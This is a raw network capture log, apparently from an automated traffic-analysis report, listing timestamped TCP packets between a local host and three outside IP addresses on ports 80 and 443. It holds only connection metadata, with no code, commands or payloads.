                                                                                                                                                                                  Dec 3, 2024 14:01:02.210603952 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.214175940 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.214306116 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.214359999 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.217973948 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.218101978 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.218151093 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.221715927 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.221771955 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.221839905 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.221885920 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.225619078 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.225667953 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.225707054 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.225754976 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.229366064 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.229434013 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.229654074 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.229700089 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.233028889 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.233078003 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.233129025 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.233180046 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.236742020 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.236808062 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:02.236851931 CET8049168142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:02.236893892 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:05.758749008 CET4916880192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:10.276767015 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:10.399399042 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:10.399512053 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:10.399780035 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:10.519809961 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.531014919 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.531099081 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.531101942 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.531115055 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.531145096 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.531157017 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.531495094 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.531506062 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.531517029 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.531541109 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.531562090 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.532193899 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.532206059 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.532217026 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.532228947 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.532242060 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.532259941 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.532284021 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.533309937 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.757045031 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.757062912 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.757128954 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.758302927 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.760385036 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.799298048 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.799321890 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.799391985 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.878345013 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.878365040 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.878412008 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.883270025 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.883328915 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.919727087 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.919745922 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.919842958 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.920116901 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.920129061 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.920161009 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.920644999 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.920663118 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.920711040 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.921153069 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.921164989 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.921212912 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:11.921700001 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.921713114 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:11.921751976 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.214039087 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.219013929 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.219079018 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.219083071 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.219118118 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.223721027 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.223771095 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.223845959 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.223880053 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.228200912 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.228256941 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.228348017 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.228394985 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.232701063 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.232753992 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.232836008 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.232872009 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.237071037 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.237124920 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.237198114 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.237237930 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.241288900 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.241353035 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.241441965 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.241488934 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.245312929 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.245367050 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.245486975 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.245536089 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.249233961 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.249291897 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.249377012 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.249414921 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.253158092 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.253211975 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.253249884 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.253285885 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.256911993 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.256964922 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.257062912 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.257107019 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:12.260821104 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:12.260906935 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:14.478698015 CET49170443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:14.478749990 CET4434917054.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:14.478813887 CET49170443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:14.479228020 CET49170443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:14.479239941 CET4434917054.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:16.368973017 CET4434917054.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:16.372487068 CET49170443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:16.502137899 CET49170443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:16.502166986 CET4434917054.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:16.509546995 CET49170443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:16.509562016 CET4434917054.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:16.535367012 CET8049169142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:16.536386967 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:17.083662033 CET4434917054.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:17.083741903 CET4434917054.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:17.083758116 CET49170443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:17.083781958 CET49170443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:17.084098101 CET49170443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:17.084114075 CET4434917054.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:18.641465902 CET4917180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:18.762655020 CET8049171142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:18.762743950 CET4917180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:19.306355953 CET49173443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:19.306404114 CET4434917354.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:19.306510925 CET49173443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:19.359359980 CET49174443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:19.359414101 CET4434917454.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:19.359492064 CET49174443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:19.389704943 CET49173443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:19.389727116 CET4434917354.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:19.397936106 CET49174443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:19.397972107 CET4434917454.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:19.749202013 CET4916980192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:21.111435890 CET4434917354.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:21.111535072 CET49173443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:21.117516041 CET49173443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:21.117536068 CET4434917354.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:21.117958069 CET4434917354.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:21.118016958 CET49173443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:21.121040106 CET4434917454.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:21.121138096 CET49174443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:21.167068005 CET49174443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:21.167095900 CET4434917454.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:21.167565107 CET4434917454.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:21.167624950 CET49174443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:21.223129034 CET49174443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:21.267338991 CET4434917454.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:21.859143019 CET4434917454.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:21.859215975 CET49174443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:21.859230995 CET4434917454.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:21.859263897 CET4434917454.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:21.859273911 CET49174443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:21.859306097 CET49174443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:21.861141920 CET49174443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:21.861165047 CET4434917454.150.207.131192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:21.863056898 CET4917180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:21.863543987 CET4917580192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:21.983505964 CET8049171142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:21.983648062 CET4917180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:21.983814955 CET8049175142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:21.983941078 CET4917580192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:21.986196041 CET4917580192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:22.106087923 CET8049175142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:23.117733002 CET8049175142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:23.117892027 CET4917580192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:27.490197897 CET4917580192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:27.490261078 CET49173443192.168.2.2254.150.207.131
                                                                                                                                                                                  Dec 3, 2024 14:01:33.118967056 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:33.119043112 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:33.119108915 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.677480936 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.677511930 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.677567005 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.677598000 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.677625895 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.691611052 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.691633940 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.691709995 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.691741943 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.691766024 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.703388929 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.703416109 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.703474045 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.703505039 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.703532934 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.717370987 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.717397928 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.717453957 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.717485905 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.717516899 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.740524054 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.740550041 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.740643024 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.740677118 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.740693092 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.833573103 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.833606958 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.833709955 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.833795071 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.833832026 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.843182087 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.843190908 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.843221903 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.843229055 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.843259096 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.843305111 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.843333960 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.843333960 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.852195024 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.852204084 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.852222919 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.852230072 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.852261066 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.852291107 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.852314949 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.852314949 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.860236883 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.860289097 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.860318899 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.860332966 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.860348940 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.860364914 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.860373974 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.860390902 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.869952917 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.869973898 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.870013952 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.870069981 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.870105028 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.870105028 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.877635956 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.877661943 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.877690077 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.877713919 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.877732992 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.877732992 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.886754036 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.886775970 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.886805058 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.886831045 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.886846066 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.902709961 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.902738094 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.902777910 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.902815104 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:35.902828932 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:35.902828932 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:36.034138918 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:36.034172058 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:36.034296989 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:36.034346104 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:36.034373999 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:36.040563107 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:36.040570974 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:36.040599108 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:36.040606022 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:36.040608883 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:36.040632010 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:36.040667057 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:36.040679932 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:36.040690899 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:36.040690899 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:36.040704966 CET49176443192.168.2.22151.101.65.137
                                                                                                                                                                                  Dec 3, 2024 14:01:36.047821999 CET44349176151.101.65.137192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:36.047830105 CET44349176151.101.65.137192.168.2.22
